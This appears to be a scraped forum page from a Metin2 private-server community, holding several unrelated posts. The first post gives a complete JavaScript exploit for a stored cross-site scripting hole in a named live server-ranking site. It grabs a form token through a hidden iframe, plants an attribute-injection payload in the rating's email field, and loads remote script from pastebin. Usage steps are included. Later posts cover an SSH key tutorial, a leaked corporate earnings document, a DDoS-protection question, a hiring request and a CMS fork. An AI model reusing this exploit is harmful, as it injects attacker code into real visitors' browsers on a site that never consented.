Search the Community

Hi, Here is a small example of a code injection on the top list: metin2pserver.info. If you want to test it yourself: I hosted the following script here ( https://pastebin.com/raw/28VjB803 ): /** * Rate. * * @param {string} serverId * @param {string} name * @param {string} email * @param {number} rating * @option 1 - Insufficient * @option 2 - Inadequate * @option 3 - Sufficient * @option 4 - Satisfying * @option 5 - Good * @option 6 - Very good * @param {string} comment * @param {number} picture * @option 1 - Warrior (m) * @option 2 - Warrior (f) * @option 3 - Ninja (m) * @option 4 - Ninja (f) * @option 5 - Sura (m) * @option 6 - Sura (f) * @option 7 - Shaman (m) * @option 8 - Shaman (f) */ function rate(serverId, name, email, rating, comment, picture = 1) { const root = document.documentElement; const iframe = document.createElement('iframe'); iframe.style.setProperty('display', 'none'); iframe.src = `https://www.metin2pserver.info/rate.php?id=${serverId}`; return new Promise((resolve) => { iframe.onload = () => { const [s] = iframe.contentDocument.getElementsByName('s'); const token = s && s.value; root.removeChild(iframe); const data = { Name: name, Email: email, Rating: rating, Comments: comment, pic: picture, id: serverId, s: token, }; const params = []; for (const param in data) { const value = data[param]; params.push(encodeURIComponent(param) + '=' + encodeURIComponent(value)); } const body = params.join('&'); if (token) { fetch(iframe.src, { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8', }, body, }) .then(() => resolve(true)) .catch(() => resolve(false)); } else { resolve(false); } }; root.appendChild(iframe); }); } if (location.hash === '#methowashere') { const serverId = /server-(.*?).html/.exec(location.href)[1]; const name = prompt('Your name'); const comment = prompt('Your comment'); rate(serverId, name, '', 1, comment); } To inject it, go to a server page (e. g.: https://www.metin2pserver.info/server-mt2aom2.html). Launch this script on the page: /** * Rate. * * @param {string} serverId * @param {string} name * @param {string} email * @param {number} rating * @option 1 - Insufficient * @option 2 - Inadequate * @option 3 - Sufficient * @option 4 - Satisfying * @option 5 - Good * @option 6 - Very good * @param {string} comment * @param {number} picture * @option 1 - Warrior (m) * @option 2 - Warrior (f) * @option 3 - Ninja (m) * @option 4 - Ninja (f) * @option 5 - Sura (m) * @option 6 - Sura (f) * @option 7 - Shaman (m) * @option 8 - Shaman (f) */ function rate(serverId, name, email, rating, comment, picture = 1) { const root = document.documentElement; const iframe = document.createElement('iframe'); iframe.style.setProperty('display', 'none'); iframe.src = `https://www.metin2pserver.info/rate.php?id=${serverId}`; return new Promise((resolve) => { iframe.onload = () => { const [s] = iframe.contentDocument.getElementsByName('s'); const token = s && s.value; root.removeChild(iframe); const data = { Name: name, Email: email, Rating: rating, Comments: comment, pic: picture, id: serverId, s: token, }; const params = []; for (const param in data) { const value = data[param]; params.push(encodeURIComponent(param) + '=' + encodeURIComponent(value)); } const body = params.join('&'); if (token) { fetch(iframe.src, { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8', }, body, }) .then(() => resolve(true)) .catch(() => resolve(false)); } else { resolve(false); } }; root.appendChild(iframe); }); } /** * Inject. * * @param {string} script * @param {string} name */ function injectScript(script, name = 'Dummy') { const serverId = /server-(.*?).html/.exec(location.href)[1]; const code = `$.getScript('${script}')`; const injection = `"style="animation:fb_transform"onanimationstart="${code}"`; console.log(`Server: ${serverId}`); console.log(`Name: ${name}`); console.log(`Script: ${script}`); console.log(`Injections: ${injection}`); return rate(serverId, name, injection, 1, '[...]'); } You can then inject it like this: injectScript('https://pastebin.com/raw/28VjB803').then((r) => console.log('Result: ', r)); You can then test it like this: https://www.metin2pserver.info/server-UGMT2.html#mailsywashere Have fun

Dear Community, In this tutorial I will show you how you to set up ssh key instead of password-based authentication for your server. With ssh key you can easily connect to your server on the ssh port without password, and it provides much stronger protection than the simple password-based authentication. First of all, you have to generate your own unique key via Puttygen by moving your mouse cursor over the blank area: Then you will get something like this: The random code that I highlighted will be needed, so do not close your generator! You can add here password protection for your key if you like, and when you are finished, save it as a private key. After that, you have to create a new user for your system without using password. My example is 'sshkeytest' After that, type the following commands: su sshkeytest cd /home/sshkeytest mkdir .ssh chmod 700 .ssh cd .ssh In this directory you have to create a file called authorized_keys2. You can do it via sftp, or by using the following command: ee authorized_keys2 Now insert the code that is shown in the Puttygen, but only to the last == characters (which I highlighted before), it must not include the rsa-key-20... characters. It is important that you have to past it in only one line. If you are ready, type the following: chmod 600 authorized_keys2 After that you have to allow your new user's login by editing the sshd_config file: ee /etc/ssh/sshd_config Search for something like this: And rewrite it to this: With this option you allowed the ssh login of the 'sshkeytest' user (and only for this user!), and disabled the root login. If you do not find these lines, you can just simple type into the end of the file. !! WARNING !! If you can connect to your server only via ssh protocoll, do not disable root login at first, because if you did something wrong, you will not be able to connect after this step. If you are ready, you have to restart the sshd: /etc/rc.d/sshd restart Now open your PageAnt, and browse your .ppk file. While PageAnt is running with your key, you can log in via Putty or FileZilla (or any other client which supports ssh key authentication) without password. If your server still asks for password, you did something wrong. Try again. With the new user you do not have full rights, but you will need root rights for many operations. You can easily switch to root by using the su command: su root After you gave the right password, you are logged in with the root user with full rights. Download the mentioned programs here. Sorry if this tutorial already exists in this board, but I could not find it anywhere. I hope that it was useful and I could help some of you with that. Good luck! Kind regards, RoxaLyssa

I found no categorie for this release and its only for the people that wanna see it ! its nothing special only the Webzen Earning Releases from "2006" i found this on a related Korean Server. that is still online (the other servers are offline because they shut down theere services for the public) i found it on a "hidden" folder that i search for (like branches , old beta clients , and other stuff) and under that stuff i found this. i am sorry about my bad english and have fun with it file - https://www.docdroid.net/QhtwnCk/webzen-earnings-release-2006-q3engupload.pdf

Hello, I see there are banners https://www.hyperfilter.com/ and I want to ask - does anyone tested protection from this service? Is better than voxility? Is better than OVH? I had servers in 'normal' OVH and from OVH game offer (better firewall, i used with "other" options in game FW panel), and I had dedicated servers in datacenters which uses voxility protection and both OVH and VOXILITY protection from time to time was not enough to prevent some kicks and downtimes for few minutes. I don't have enough money for test-buy dedicated server, i want to ask first

Im looking for an experienced person for fixing security issues in maxmi 4.1 such as fake logins port scamming exploits channel floods and more... Im paying a fair price!

Hi, I am working on a Fork (Open Source) of hennink's metin2 CMS. A lot of people have already tried to recode this system but more or less the most of it is trash. Why a Fork of an outdated CMS? We all know that the used mysql_* functions in this CMS are outdated, the codesemantic is weak and the structure bulding isnt that good, too. Fact is that the Hen! CMS is the most used system and I don't think that the community is ready for new systems because of silly entrenched habit. It is undeniable that a CMS developed from the ground up is much better (like projects by ChuckNorris) but people which have used this system for years wouldn't change to a completely new CMS that fast. Let me explain this by an example: How much people (including me) tried to code a new and better toplist for this com? Unsuccessfully although the basic approaches where much better. What I am NOT doing: - I will not just replace the querys and say its finished! - I will not copy the whole code and say its finished What i am doing: - I will create an OOP Fork of THIS CMS which will be save, timely and familiar to the people. - I will deffently write a beginner friendly documentation. - I will create a simple installer to use this CMS without any problems (check if important tables or column already exist or missing ect.) Techniques: - Rebuild existing code to a semantic code. - MySQLi (we dont have to talk about using PDO or what is the best) - only a few OOP techniques because Object-Oriented Programming is too difficult to comprehend for the most in this com) - Better structure - jQuery features for better usability Main Features: - mod_rewrite (SEO friendly URLs) - language system [IMG01] - auctionhouse (+ Quest for easy implementation) - better statistics - Better Login (login attempts against Bruteforce, login faillogs) - Coinslog for Users (when did i buy coins? where did i spend coins (item Shop, auctionhouse)? and how much ) - Better register (we all know that the current form is shit when having an error) [IMG01] - Rankings (PVP, top player, top guild etc.) - Itemshop - Simple but effective ticketsystem [IMG01 , IMG02] I will not implement this things: Download: https://github.com/iseries/MT2cms Changelog: [14.01.2015] [Add] - Add auto language detection and ACP option > [13.01.2015] [Add] - Add IP and port control (Server Settings) + view > [07.01.2015] [Add] - Coins History for Member. > [07.01.2015] [Add] - Referral System. > [04.01.2015] [Add] - Logs in adminCP. > [03.01.2015] [Add] - Add installer. > [03.01.2015] [Add] - Add some basic settings. > [19.12.2014] [Add] - Add register. > [17.12.2014] [Edit] - Statistics expanded > [15.12.2014] [Edit] - You can enter site title and other website informations in the adminCP now. no need to edit the config.inc.php [15.12.2014] [Add] - statistics in adminCP. > show [15.12.2014] [Add] - backup system in adminCP. > show [12.12.2014] [Add] - implemented overview in adminCP. > show [12.12.2014] [Edit] - Cleaned up language files and split all entries to seperate category groups. > show [12.12.2014] [Add] - New Adminoptions in the ticket sections: disable/enable ticketsystem, disable/enable email notice for new tickets. [12.12.2014] [Add] - Admin CP is now in the sidenavigation. [12.12.2014] [Add] - SA can search tickets by ticket IDs now. > show [12.12.2014] [Edit] - recoded the paginations (more opportunities). > show Important: I will kick your ass if you post shit like: "This is not necessary". It is my intention to do this because I want to do this! You can bring ideas or constructive feedback but no bullshit. I will release this ONLY here (metin2dev) when I'm done. epvp can suck my **** and if someone releases this there, I will report that. Special thanks: Krusty, SoNiice, hennink, Denis, NotEnoughForYou, Yoshix3, Stefan, ManojGeek